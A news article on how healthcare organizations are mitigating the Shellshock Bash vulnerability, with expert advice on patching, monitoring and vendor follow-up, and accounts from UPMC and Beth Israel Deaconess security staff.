Shellshock: Healthcare Mitigation StepsExpert Insights on a Breach Prevention Strategy
If healthcare organizations want to know why it's so important to take seriously the job of mitigating the risk posed by the Bash flaws known as Shellshock, all they need to do is consider the experience of Community Health Systems earlier this year. Some experts believe Chinese hackers took advantage of the Heartbleed OpenSSL vulnerability when they gained access to the data of 4.5 million patients of the hospital chain.
The concern now is that attackers may exploit a new, widespread vulnerability that healthcare institutions have yet to patch or mitigate. "While it's still being determined if Shellshock is as damaging as Heartbleed, it's certainly as serious," says Brian Evans, senior managing consultant at IBM Security Services.
So, healthcare organizations must mitigate the Shellshock vulnerability now to help avoid becoming the next mega-breach victim.
The National Health Information Sharing and Analysis Center says it's receiving reports that hackers are already targeting healthcare organizations, looking to take advantage of Shellshock.
"NH-ISAC has received reports of organizations being scanned for this vulnerability and seeing a high volume of traffic searching for the vulnerability, in some cases, in excess of 1,000 hits per hour," the organization tells Information Security Media Group. "This equates to high counts of attackers looking for opportunities to try and execute the code, and then transition to malware-based e-mails that look to exploit the vulnerability as well."
The Health Information Trust Alliance on Sept. 25 issued an alert on Shellshock "to ensure healthcare organizations are appropriately informed and taking steps to safeguard their systems and have sufficient information to communicate the background and implications to others in their organizations."
Daniel Nutkis, HITRUST CEO, tells ISMG: "We have also experienced an uptick in organizations reaching out with questions about the threat indicators ... but it's still too early to tell on the overall effectiveness of the response."
Shellshock refers to vulnerabilities in the Bourne-again shell system software, known as Bash. It's a common command line that's present in many flavors of Unix, including Linux distributions, more than 500 million Apache-based Web servers and Apple's Mac OS operating system. In other words, the command shell exists all over the Internet, from Web servers and e-mail servers to physical security systems and beyond.
Because attackers could exploit the Shellshock flaws to execute shell commands remotely, they could potentially take control of a healthcare system, dump all data stored on the system, as well as launch automated worms that could use the vulnerability to exploit every Bash-using system inside a network, security experts say. That's why they recommend all enterprises scan for Bash flaws, apply related patches whenever possible, or use virtual patching and similar systems to mitigate risks for systems that have yet to be patched by vendors.
5 Steps to Take
While that's the general advice, IBM's Evans - and other experts - recommend healthcare organizations:
- Work with vendors to identify all systems that need patching, such as those running Unix, Linux, Mac OS X, and potentially Windows too, if your organization is using Cygwin.
- Include medical devices and network devices in that patching assessment.
- Patch Internet-facing systems first.
- Pay close attention to logs and network traffic in the coming weeks and months to quickly identify any potential compromised systems.
- Review the steps that business associates are taking to protect systems against critical vulnerabilities.
"Covered entities should ask their BAs for an official communication on what they are doing regarding the recent Shellshock/Bash issue and their timeline to address the vulnerability," Evans says.
In the Trenches
The University of Pittsburgh Medical Center is taking many of those steps, plus more, says John Houston, vice president of privacy and information security.
In dealing with any emerging vulnerability, UPMC performs environmental scans to identify vulnerable systems, application and devices that need to be remediated, then also performs "double checks," he says.
"Our process is the same no matter what the vulnerability," Houston says. "But because the industry identified Shellshock as a critical vulnerability, the urgency is raised."
UPMC is applying patches available from vendors and demanding patches from some companies, such as medical equipment manufacturers, that have yet to provide them, Houston says.
In cases where no patch is yet available, the medical center is pursuing other mitigation steps, including using more intense monitoring of networks and systems, and ensuring - whenever possible - that unpatched systems aren't left exposed to the Internet, Houston explains.
"You have to make sure the perimeter is protected. Also, network traffic can be an indication of a vulnerability being exploited," he says. "You might see a [compromised] system phoning home for a computer. You look at traffic and see where it's occurring."
A continuing focus on improving its configuration management capabilities helped Beth Israel Deaconess Medical Center to quickly identify and patch potentially Shellshock-vulnerable systems in its data center, says Michael Yamamoto, lead security engineer at the Boston-based medical center.
"The most important step we took was to evaluate our publicly accessible systems and attempt to remediate [them]. We quickly developed custom signatures for our intrusion detection/intrusion protection and Web application firewall systems to help protect the environment, which were replaced with 'official signatures' once those were made available," he says.
"Patching and remediating major, publicly known-vulnerable systems was straightforward and easy," Yamamoto says. "Unlike Heartbleed, however, using automated scans to find systems which aren't yet known to be vulnerable is much more difficult. It's possible there will be many legacy embedded devices which will never have patches available."
The key to addressing Shellshock, or any other "vulnerability of the week or month," UPMC's Houston says, is to have a methodical response plan in place, as well as to respond quickly, be nimble, and maintain a good inventory of all systems, software, and devices that could be at risk.
That means always keeping response teams on standby. "We deal with patching systems all the time, it's a regular occurrence, not a foreign event," he says. "Based on industry warnings, the criticality is higher with some vulnerabilities, such as Shellshock."